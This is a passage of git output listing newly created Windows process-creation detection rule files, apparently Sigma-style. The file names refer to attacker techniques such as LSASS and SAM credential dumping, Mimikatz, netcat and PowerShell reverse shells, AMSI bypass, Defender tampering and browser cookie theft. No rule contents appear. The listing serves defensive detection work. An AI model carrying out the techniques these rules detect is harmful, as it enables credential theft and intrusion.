bin/main/rules/windows/process_creation/proc_creation_win_lolbin_pcwrun_follina.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_lolbin_pktmon.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_lolbin_presentationhost.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_lolbin_printbrm.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_lolbin_pubprn.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_lolbin_rasautou_dll_execution.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_lolbin_remote.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_lolbin_replace.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_lolbin_rundll32_installscreensaver.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_lolbin_scriptrunner.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_lolbin_susp_acccheckconsole.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_lolbin_susp_atbroker.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_lolbin_susp_certreq_download.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_lolbin_susp_dxcap.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_lolbin_susp_grpconv.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_lolbin_susp_mpcmdrun_download.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_lolbin_susp_sqldumper_activity.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_lolbin_susp_wsl.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_execute_psh.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_lolbin_ttdinject.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_lolbin_tttracer_mod_load.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_lolbin_utilityfunctions.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_lolbin_visual_basic_compiler.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_lolbin_visualuiaverifynative.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_lolbin_vsiisexelauncher.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_lolbin_wfc.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_lolbin_winword.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_lolbin_wlrmdr.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_lolbins_by_office_applications.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_lolbins_with_wmiprvse_parent_process.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_long_powershell_commandline.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_lsass_dump.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_mailboxexport_share.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_mal_adwind.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_mal_blue_mockingbird.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_mal_darkside_ransomware.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_mal_hermetic_wiper_activity.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_mal_lockergoga_ransomware.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_mal_ryuk.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_malware_conti.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_malware_conti_7zip.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_malware_conti_shadowcopy.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_malware_dridex.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_malware_dtrack.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_malware_emotet.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_malware_formbook.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_malware_notpetya.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_malware_qbot.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_malware_ryuk.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_malware_script_dropper.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_malware_trickbot_recon_activity.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_malware_trickbot_wermgr.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_malware_wannacry.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_manage_bde_lolbas.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_mavinject_proc_inj.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_meterpreter_or_cobaltstrike_getsystem_service_start.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_mimikatz_command_line.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_mmc20_lateral_movement.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_mmc_spawn_shell.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_modif_of_services_for_via_commandline.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_monitoring_for_persistence_via_bits.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_mouse_lock.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_msdeploy.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_msdt.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_msdt_diagcab.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_msdt_susp_cab_options.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_msdt_susp_parent.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_msedge_minimized_download.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_mshta_javascript.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_mshta_spawn_shell.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_msiexec_dll.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_msiexec_embedding.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_msiexec_execute_dll.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_msiexec_install_quiet.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_msra_process_injection.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_mstsc.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_multiple_susp_cli.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_net_enum.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_net_use_admin_share.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_net_user_add.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_netcat_execution.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_netsh_allow_port_rdp.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_netsh_fw_add.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_netsh_fw_add_susp_image.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_netsh_fw_enable_group_rule.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_netsh_packet_capture.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_netsh_port_fwd.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_netsh_port_fwd_3389.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_netsh_wifi_credential_harvesting.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_network_scan_loop.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_network_sniffing.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_new_service_creation.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_nltest_recon.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_non_interactive_powershell.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_non_priv_reg_or_ps.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_office_applications_spawning_wmi_commandline.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_office_dir_traversal_cli.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_office_from_proxy_executing_regsvr32_payload.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_office_from_proxy_executing_regsvr32_payload2.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_office_shell.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_office_spawn_exe_from_users_directory.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_office_spawning_wmi_commandline.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_outlook_shell.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_pingback_backdoor.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_plugx_susp_exe_locations.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_possible_applocker_bypass.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_possible_privilege_escalation_via_service_reg_perm.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_powershell_amsi_bypass.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_powershell_audio_capture.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_powershell_b64_shellcode.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_powershell_bitsjob.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_powershell_cmdline_reversed_strings.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_powershell_cmdline_special_characters.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_powershell_cmdline_specific_comb_methods.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_powershell_defender_base64.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_powershell_defender_disable_feature.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_powershell_defender_exclusion.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_powershell_disable_windef_av.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_powershell_dll_execution.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_powershell_downgrade_attack.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_powershell_download.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_powershell_download_patterns.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_powershell_frombase64string.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_powershell_get_clipboard.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_powershell_public_folder.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_powershell_reverse_shell_connection.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_powershell_snapins_hafnium.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_powershell_susp_parameter_variation.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_powershell_xor_commandline.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_powersploit_empire_schtasks.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_proc_dump_createdump.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_proc_dump_dumpminitool.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_proc_dump_rdrleakdiag.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_proc_dump_susp_dumpminitool.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_proc_wrong_parent.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_procdump.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_procdump_evasion.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_process_dump_rdrleakdiag.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_process_dump_rundll32_comsvcs.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_protocolhandler_susp_file.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_proxy_execution_wuauclt.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_psexesvc_start.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_public_folder_parent.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_purplesharp_indicators.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_pypykatz.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_python_pty_spawn.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_query_registry.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_ransom_blackbyte.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_rdp_hijack_shadowing.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_redirect_to_stream.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_redmimicry_winnti_proc.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_reg_add_run_key.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_reg_defender_exclusion.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_reg_defender_tampering.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_reg_dump_sam.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_reg_enable_rdp.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_reg_lsass_ppl.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_reg_service_imagepath_change.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_regedit_export_critical_keys.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_regedit_export_keys.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_regedit_import_keys.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_regedit_import_keys_ads.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_regini.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_regini_ads.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_remote_powershell_session_process.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_remote_time_discovery.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_remove_windows_defender_definition_files.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_renamed_binary.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_renamed_browsercore.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_renamed_jusched.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_renamed_megasync.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_renamed_msdt.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_renamed_paexec.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_renamed_plink.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_renamed_powershell.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_renamed_procdump.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_renamed_psexec.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_renamed_rundll32.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_renamed_whoami.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_root_certificate_installed.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_rpcss_anomalies.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_run_executable_invalid_extension.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_run_from_zip.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_run_powershell_script_from_ads.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_run_powershell_script_from_input_stream.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_run_virtualbox.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_rundll32_not_from_c_drive.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_rundll32_parent_explorer.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_rundll32_registered_com_objects.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_rundll32_without_parameters.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_schtasks_appdata_local_system.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_schtasks_powershell_windowsapps_execution.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_schtasks_reg_loader.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_screenconnect.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_screenconnect_anomaly.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_script_event_consumer_spawn.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_sdbinst_shim_persistence.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_sdclt_child_process.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_sdelete.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_sdiagnhost_susp_child.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_service_execution.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_service_stop.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_set_policies_to_unsecure_level.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_shadow_copies_access_symlink.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_shadow_copies_creation.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_shadow_copies_deletion.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_shell_spawn_by_java.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_shell_spawn_susp_program.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_silenttrinity_stage_use.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_software_discovery.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_soundrec_audio_capture.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_spn_enum.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_sqlcmd_veeam_dump.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_sqlite_firefox_cookies.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_sticky_keys_unauthenticated_privileged_cmd_access.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_stickykey_like_backdoor.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_stordiag_execution.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_sus_auditpol_usage.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_7z.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_ad_reco.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_add_user_remote_desktop.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_adfind.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_adfind_enumerate.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_adidnsdump.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_advancedrun.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_advancedrun_priv_user.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_athremotefxvgpudisablementcommand.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_base64_invoke.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_base64_load.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_bcdedit.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_bginfo.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_bitstransfer.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_calc.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_cdb.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_certutil_command.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_certutil_encode.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_char_in_cmd.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_child_process_as_system_.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_cipher.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_cli_escape.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_cmd_http_appdata.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_cmd_shadowcopy_access.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_codepage_lookup.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_codepage_switch.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_commandline_chars.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_commands_recon_activity.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_compression_params.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_comsvcs_procdump.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_conhost.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_conhost_option.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_control_cve_2021_40444.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_control_dll_load.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_copy_lateral_movement.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_copy_system32.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_covenant.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_crackmapexec_execution.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_crackmapexec_flags.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_crackmapexec_powershell_obfuscation.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_csc.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_csc_folder.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_cscript_vbs.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_csi.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_curl_download.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_curl_fileupload.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_curl_start_combo.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_curl_useragent.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_dctask64_proc_inject.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_del.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_desktopimgdownldr.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_devinit_lolbin.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_devtoolslauncher.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_dir.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_direct_asep_reg_keys_modification.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_disable_eventlog.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_disable_ie_features.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_disable_raccine.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_diskshadow.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_ditsnap.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_dllhost_no_cli.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_dnx.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_double_extension.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_download_office_domain.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_dtrace_kernel_dump.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_emotet_rundll32_execution.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_esentutl_params.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_eventlog_clear.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_execution_path.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_execution_path_webserver.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_explorer.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_explorer_break_proctree.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_explorer_nouaccheck.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_file_characteristics.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_file_download_via_gfxdownloadwrapper.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_findstr_385201.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_findstr_lnk.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_finger_usage.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_firewall_disable.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_format.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_fsutil_usage.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_ftp.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_gpresult.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_gup.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_gup_download.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_gup_execution.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_hostname.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_image_missing.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_instalutil.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_iss_module_install.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_lsass_clone.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_machineguid.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_mounted_share_deletion.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_mpiexec_lolbin.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_mshta_execution.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_mshta_pattern.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_msiexec_cwd.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_msiexec_web_install.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_msoffice.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_net_execution.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_net_use_password_plaintext.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_netsh_command.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_netsh_dll_persistence.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_network_command.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_network_listing_connections.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_ngrok_pua.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_nmap.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_non_exe_image.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_nt_resource_kit_auditpol_usage.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_ntdll_type_redirect.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_ntds.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_ntdsutil.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_ntlmrelay.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_odbcconf.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_openwith.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_outlook.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_outlook_temp.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_parents.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_pcwutl.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_pester.yml create mode 100644 